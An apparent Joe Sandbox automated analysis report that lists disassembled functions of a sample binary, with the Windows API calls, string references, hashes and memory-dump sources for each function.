String ID:
API String ID: 2710830443-0
Opcode ID: 65c1cb7081a8e5bcf71e574604ae68a70480bb129cc26e64717fbd2fbf345135
Instruction ID: cdde50f39b0fd9053bd5f424a56461b9fb091a8eac67954c4971db145cdc372d
Opcode Fuzzy Hash: 65c1cb7081a8e5bcf71e574604ae68a70480bb129cc26e64717fbd2fbf345135
Instruction Fuzzy Hash: 3DE092B119A2267BDB201B769C0DFEB3F6CEF43BA1F400016F505D50C19AA4C880D6F0

Function 009D8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00959639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00959693
Part of subcall function 00959639: SelectObject.GDI32(?,00000000), ref: 009596A2
Part of subcall function 00959639: BeginPath.GDI32(?), ref: 009596B9
Part of subcall function 00959639: SelectObject.GDI32(?,00000000), ref: 009596E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 009D8887
LineTo.GDI32(?,?,?), ref: 009D8894
EndPath.GDI32(?), ref: 009D88A4
StrokePath.GDI32(?), ref: 009D88B2

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 8153abd0fee07f5988ffb33010fd7c0cdbb7f75bea6e3365a6d9f836a825fe38
Instruction ID: a0459fb172713d49563f07b58ce96550aa02cc7ccdae1d8f3afd5710e04408ab
Opcode Fuzzy Hash: 8153abd0fee07f5988ffb33010fd7c0cdbb7f75bea6e3365a6d9f836a825fe38
Instruction Fuzzy Hash: 97F03A3608A259FAEF125F94AC09FCA3B5DAF06311F448002FA21651E2C7755551EBA5

Function 009598B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 009598CC
SetTextColor.GDI32(?,?), ref: 009598D6
SetBkMode.GDI32(?,00000001), ref: 009598E9
GetStockObject.GDI32(00000005), ref: 009598F1

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: c17c1553435588fb57eb653cf87829b47615eb42f5b3591efb314b128791894c
Instruction ID: 2dd4bde34bcdbbceca3eede1a1bb1b34a865ee0b98f9a8c2a3c9b728b6ecb59f
Opcode Fuzzy Hash: c17c1553435588fb57eb653cf87829b47615eb42f5b3591efb314b128791894c
Instruction Fuzzy Hash: 6CE0657129D251AADF215BB8BC09BE87F15AB11336F04821AF6F5540E1C7714680EB11

Function 009A162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 009A1634
OpenThreadToken.ADVAPI32(00000000,?,?,?,009A11D9), ref: 009A163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009A11D9), ref: 009A1648
OpenProcessToken.ADVAPI32(00000000,?,?,?,009A11D9), ref: 009A164F

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: b50b080c5f2c2eea848422c10f9442ed321268f2a7581bfacb14de7698dd07d9
Instruction ID: 781f8e89fe3a32530a0beef534a9db7f7bc20a08fb55a60f7e705870bebbfbe3
Opcode Fuzzy Hash: b50b080c5f2c2eea848422c10f9442ed321268f2a7581bfacb14de7698dd07d9
Instruction Fuzzy Hash: 02E086B1697212DBDB201FE09E0DB463B7CAF557A1F144809F245D9080D7348480D790

Function 0099D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0099D858
GetDC.USER32(00000000), ref: 0099D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0099D882
ReleaseDC.USER32(?), ref: 0099D8A3

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 3c6149e7374204050b7fa61c5514301e1b053b580f1b6474472f5b319c3937d9
Instruction ID: a4083d121b53d09a41a6804ab75e5687c9c922a73b7f428041a14ef5f02a8a44
Opcode Fuzzy Hash: 3c6149e7374204050b7fa61c5514301e1b053b580f1b6474472f5b319c3937d9
Instruction Fuzzy Hash: DBE01AF0856206DFCF419FE1D80CA6DBBB5FB08311F14844AE806E7250C7389985EF40

Function 0099D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0099D86C
GetDC.USER32(00000000), ref: 0099D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0099D882
ReleaseDC.USER32(?), ref: 0099D8A3

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 838dbcf782ce2189723845a4ea77cfb089ca9f94dce9ec99f637a1acb1c2eff7
Instruction ID: 2b74fbb05dbb0a395b8a9985088d2b0e162215ee2d6f9ecc122c28ab19c16dd0
Opcode Fuzzy Hash: 838dbcf782ce2189723845a4ea77cfb089ca9f94dce9ec99f637a1acb1c2eff7
Instruction Fuzzy Hash: 28E01AB0856206DFCF509FA0D80C66DBBB1FB08311F14844AE806E7250C7389945EF40

Function 009B4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00947620: _wcslen.LIBCMT ref: 00947625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 009B4ED4

Strings

LPT, xrefs: 009B4DFB
*, xrefs: 009B4E10

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 20610f4f6246f92e7e8c7ccd4fe5ed33b31b212e1508d58a09ea5c7bee69e304
Instruction ID: fb5ed206db58b048c55f282a847d53d646877fd05e447b743870146fdb487a38
Opcode Fuzzy Hash: 20610f4f6246f92e7e8c7ccd4fe5ed33b31b212e1508d58a09ea5c7bee69e304
Instruction Fuzzy Hash: A5917F75A002149FCB14DF58C584EAABBF5BF48314F198099E80A9F3A3C735EE85DB91

Function 0096E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0096E30D

Strings

pow, xrefs: 0096E2E5, 0096E302

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 8f2b8eb1ed21137a1bf6c6106d60e5291224f29b7550b39a98e03848b3c1b864
Instruction ID: 5ea37d14fcb54d6560837c42917471b51430d9961794ffbe7671bae7195aee3c
Opcode Fuzzy Hash: 8f2b8eb1ed21137a1bf6c6106d60e5291224f29b7550b39a98e03848b3c1b864
Instruction Fuzzy Hash: 9E518E66A1C20296CB267754CD41779BBACEF40740F34CD68E0D9873F8EF348C959A86

Function 0095E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0095E1B1

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: f4b75e8ff4ef429085c39139dbd7c589051b6510faee7b12090d119a4ca0c32e
Instruction ID: 991be25fc65aa657ee8c5eaf8a50bb9bbccd5679486dcf5deb8072d3ba7c9017
Opcode Fuzzy Hash: f4b75e8ff4ef429085c39139dbd7c589051b6510faee7b12090d119a4ca0c32e
Instruction Fuzzy Hash: AE514271904346DFDF19DFA8C081AFA7BACEF55311F248415ECA19B2C0D6359E86CBA1

Function 0095F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0095F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 0095F2BB

Strings

@, xrefs: 0095F2AF

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: b1973db4600558f83f3f23786b1de4eca4830e527dc18798fa0dddbdcd9f6518
Instruction ID: 538b7967d0bfc6b65f3c87c82f804fd2d138dbf957820eda499c450ce18fc9d0
Opcode Fuzzy Hash: b1973db4600558f83f3f23786b1de4eca4830e527dc18798fa0dddbdcd9f6518
Instruction Fuzzy Hash: E65133B24197489BD320AF50D886BABBBF8FBC4300F81885DF1D9411A5EB318569CB67

Function 009C5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 009C57E0
_wcslen.LIBCMT ref: 009C57EC

Strings

CALLARGARRAY, xrefs: 009C57E6, 009C57EB

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 82527b0b889a03b74a4d1aa918ccc5bd453ff0446e79b82daa882404ade771f8
Instruction ID: ecd978f95867e2fde27aaa5862dedb2337d823cb1435de54aa836bf839ea10f6
Opcode Fuzzy Hash: 82527b0b889a03b74a4d1aa918ccc5bd453ff0446e79b82daa882404ade771f8
Instruction Fuzzy Hash: C641AF71E002099FCB14DFA9C891EAEBBB9EF99350F11402DF505A7261E730AD81CBA1

Function 009BD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009BD130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009BD13A

Strings

|, xrefs: 009BD10B

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 5abe68552246bc37a64ab199bb675431b3ba1d08f29aa31aebfcd6b7d17f9ffc
Instruction ID: a13107ad7595f5b092f3b137f796abc21c1c51233ed94ffbd6d8e3e98bbf9d12
Opcode Fuzzy Hash: 5abe68552246bc37a64ab199bb675431b3ba1d08f29aa31aebfcd6b7d17f9ffc
Instruction Fuzzy Hash: C5313971D01209ABCF15EFA4CD85EEF7FB9FF45310F000019E815A6262E731AA16CB50

Function 009D356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 009D3621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 009D365C

Strings

static, xrefs: 009D35BC

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 5749dc9a3aa5478cf974870a92e635b7754ced681e3ecb99e8a0174af9eeb631
Instruction ID: b7bc23ff032264f0448131e1e22a320f74dfbe104db7a195778432829eebe7b7
Opcode Fuzzy Hash: 5749dc9a3aa5478cf974870a92e635b7754ced681e3ecb99e8a0174af9eeb631
Instruction Fuzzy Hash: 4331AAB1150204AEDB109F68DC81FBB73ADFF88724F40C61AF8A997280DA31ED81D761

Function 009597C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 00959BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00959BB2

Part of subcall function 00959944: GetWindowLongW.USER32(?,000000EB), ref: 00959952

GetParent.USER32(?), ref: 009973A3
DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 0099742D

Strings

0n, xrefs: 0095980F, 009973D2, 009973F9

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: LongWindow$ParentProc
String ID: 0n
API String ID: 2181805148-3368625520
Opcode ID: 66c6c7d7786b423e0c4a185b08cbc11cc4a3d9afb756d729ebf57162bf5b632d
Instruction ID: 90eb1d9102bbcb70a955882f978fcf6ec61240aa75bab68c4a01e46fd2695429
Opcode Fuzzy Hash: 66c6c7d7786b423e0c4a185b08cbc11cc4a3d9afb756d729ebf57162bf5b632d
Instruction Fuzzy Hash: 1D21D030604104EFEF25CFAEDC59AA93BAAEF4A360F044255FE254B2B2C7318D55E740

Function 009D31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009D327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009D3287

Strings

Combobox, xrefs: 009D3249

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: d81b3fc4007c1b9a715f12d4141fe958649e0f8d99d928101bb55e5f26db7d92
Instruction ID: 5fc6c433181e07e741f43004379bf453d2dd05a9c6a8fa464f78e98cdac08bac
Opcode Fuzzy Hash: d81b3fc4007c1b9a715f12d4141fe958649e0f8d99d928101bb55e5f26db7d92
Instruction Fuzzy Hash: 7F11E6717801087FEF119E94DC80EBB375EEB94365F10C126F62497390D6319D518760

Function 009D32A6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

CreatePopupMenu.USER32 ref: 009D32C7
CreatePopupMenu.USER32 ref: 009D3339

Strings

0n, xrefs: 009D3313, 009D334B

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CreateMenuPopup
String ID: 0n
API String ID: 3826294624-3368625520
Opcode ID: 8ee057e4f3afca2b162f0e9d2cc4ff453ae1dd2c534310ba270fcf1ef559c67d
Instruction ID: 51380582fbace6b5de1c531e9bd898d4ffd71657efb251157517c04f9db751d6
Opcode Fuzzy Hash: 8ee057e4f3afca2b162f0e9d2cc4ff453ae1dd2c534310ba270fcf1ef559c67d
Instruction Fuzzy Hash: 12216D74A482049FCB20CF68C445BD6B7E9FB0A365F08C05BE9699B351D331AE42DF52

Function 009D3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0094600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0094604C
Part of subcall function 0094600E: GetStockObject.GDI32(00000011), ref: 00946060
Part of subcall function 0094600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0094606A

GetWindowRect.USER32(00000000,?), ref: 009D377A
GetSysColor.USER32(00000012), ref: 009D3794

Strings

static, xrefs: 009D3757

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 147c0bd07e7c0fde7f2fecd95bdf3f78946658476ce9054d157e251bbc6e0065
Instruction ID: 84dc8693bdc909b0d7bcc7dce9ef0258cb1a3d0955a08e6f1a1d13dc1a59e5ff
Opcode Fuzzy Hash: 147c0bd07e7c0fde7f2fecd95bdf3f78946658476ce9054d157e251bbc6e0065
Instruction Fuzzy Hash: 1E1137B265060AAFDF00DFA8CC46EEA7BF8FB08355F008916F955E2250E735E851DB60

Function 009D6181 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 009D61FC
SendMessageW.USER32(?,00000194,00000000,00000000), ref: 009D6225

Strings

0n, xrefs: 009D61A2

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessageSend
String ID: 0n
API String ID: 3850602802-3368625520
Opcode ID: 1066712ba1951a3fb6db29bcabca22c98b64a6a34f7db02e15e288f24cfdd078
Instruction ID: d62f103e83b4bc51a377ad15e6c8cc033e1775f06fe3c405c21855ded842fb58
Opcode Fuzzy Hash: 1066712ba1951a3fb6db29bcabca22c98b64a6a34f7db02e15e288f24cfdd078
Instruction Fuzzy Hash: FD11C4711C4214BEEF108FA8CD15FB93BA9EB0A310F008116FB26DA2D1D6B4EA40DB50

Function 009BCD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 009BCD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 009BCDA6

Strings

<local>, xrefs: 009BCD66

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 8a9722977aa643ab4db9a3a4017b2078fd213c1ad9c0a979e74aad67e2490a26
Instruction ID: 12c785c60d46ada76e4e80a2cf13154098214bdb09bbccce123fbedb447063c4
Opcode Fuzzy Hash: 8a9722977aa643ab4db9a3a4017b2078fd213c1ad9c0a979e74aad67e2490a26
Instruction Fuzzy Hash: 5F1102F9205636BAD7384B668C48EE7BEACEF927B4F40462AB149830C0D7749840D6F0

Function 009D3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 009D34AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009D34BA

Strings

edit, xrefs: 009D348F

Memory Dump Source

